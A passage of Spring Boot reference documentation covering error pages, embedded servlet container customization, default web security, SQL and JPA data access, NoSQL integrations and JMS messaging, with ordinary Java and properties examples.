mapping by default that handles all errors in a\nsensible way, and it is registered as a ``global'' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a ``whitelabel'' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to ``error''). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer() {\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-exception-handlers[`@ExceptionHandler`\nmethods] and http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/htmlsingle\/#mvc-ann-controller-advice[`@ControllerAdvice`].\nThe `ErrorController` will then pick up any unhandled exceptions.
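\n\nFor example, a minimal `@ControllerAdvice` sketch (the exception type and status are\nillustrative choices, not part of the original text):\n\n[source,java,indent=0]\n----\n\t@ControllerAdvice\n\tpublic class MyExceptionHandler {\n\n\t\t@ExceptionHandler(IllegalStateException.class)\n\t\t@ResponseStatus(HttpStatus.CONFLICT)\n\t\tpublic void handleConflict() {\n\t\t\t\/\/ respond with a 409 status; add logging or a response body as needed\n\t\t}\n\n\t}\n----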
\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate ``Starter POM'' to obtain a fully configured instance. By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlet beans the bean name will be used as a path prefix. Filters\nwill map to `\/*`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control, as\nsketched below. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.
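\n\nFor example (a minimal sketch; `MyServlet` and the `\/my\/*` mapping are illustrative):\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic ServletRegistrationBean myServlet() {\n\t\tServletRegistrationBean registration =\n\t\t\t\tnew ServletRegistrationBean(new MyServlet(), \"\/my\/*\");\n\t\t\/\/ init parameters end up in the usual ServletConfig\n\t\tregistration.addInitParameter(\"debug\", \"true\");\n\t\treturn registration;\n\t}\n----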
\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, \"\/notfound.html\"));\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n``hooks'' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.
\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith ``basic'' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user (``user'' username and random\npassword, printed at INFO level when the application starts up):\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebSecurityConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`\/css\/**`, `\/js\/**`,\n `\/images\/**` and `**\/favicon.ico`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`security.*`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebSecurityConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`, as sketched below.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`management.security.*`). To override the application access rules\nadd a `@Bean` of type `WebSecurityConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.
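\n\nFor example, a minimal access-rule override sketch (the `\/public\/**` matcher is\nillustrative):\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)\n\tpublic class ApplicationSecurity extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ open up \/public\/** but keep HTTP Basic security everywhere else\n\t\t\thttp.authorizeRequests()\n\t\t\t\t.antMatchers(\"\/public\/**\").permitAll()\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.and().httpBasic();\n\t\t}\n\n\t}\n----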
\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases, from\ndirect JDBC access using `JdbcTemplate` to complete ``object relational mapping''\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The ``How-to'' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If commons-dbcp is available we will use that, but we don't recommend it in production.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n``starter POMs'' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`spring.datasource.*`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. 
if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and ``Spring Data''\nThe Java Persistence API is a standard technology that allows you to ``map'' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/[``Accessing Data with JPA''] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA ``Entity'' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead ``Entity Scanning'' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.state = state;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. 
For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default a JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`spring.jpa.*` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `spring.jpa.properties.*` (the prefix is stripped before adding them\nto the entity manager). By default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine-grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. 
Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (the exception is `RedisTemplate`, where the exclusion is based on the bean name\n``redisTemplate'', not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.
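\n\nOnce injected, usage follows plain Spring Data Redis (a quick sketch; the key and value\nare illustrative):\n\n[source,java,indent=0]\n----\n\t\/\/ inside MyBean, using the injected StringRedisTemplate\n\tthis.template.opsForValue().set(\"spring:boot\", \"rocks\");\n\tString value = this.template.opsForValue().get(\"spring:boot\");\n----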
\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` ``Starter POM''.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set the `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` ``Starter POM''\nfor collecting the dependencies in a convenient way. There is currently no auto-configuration\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. 
By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elastic Search] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` ``Starter POM'' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated ``host:port'' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. 
Spring AMQP provides a similar feature set for the\n``Advanced Message Queuing Protocol'' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details).\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`spring.hornetq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the ``name'' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`spring.activemq.*`. 
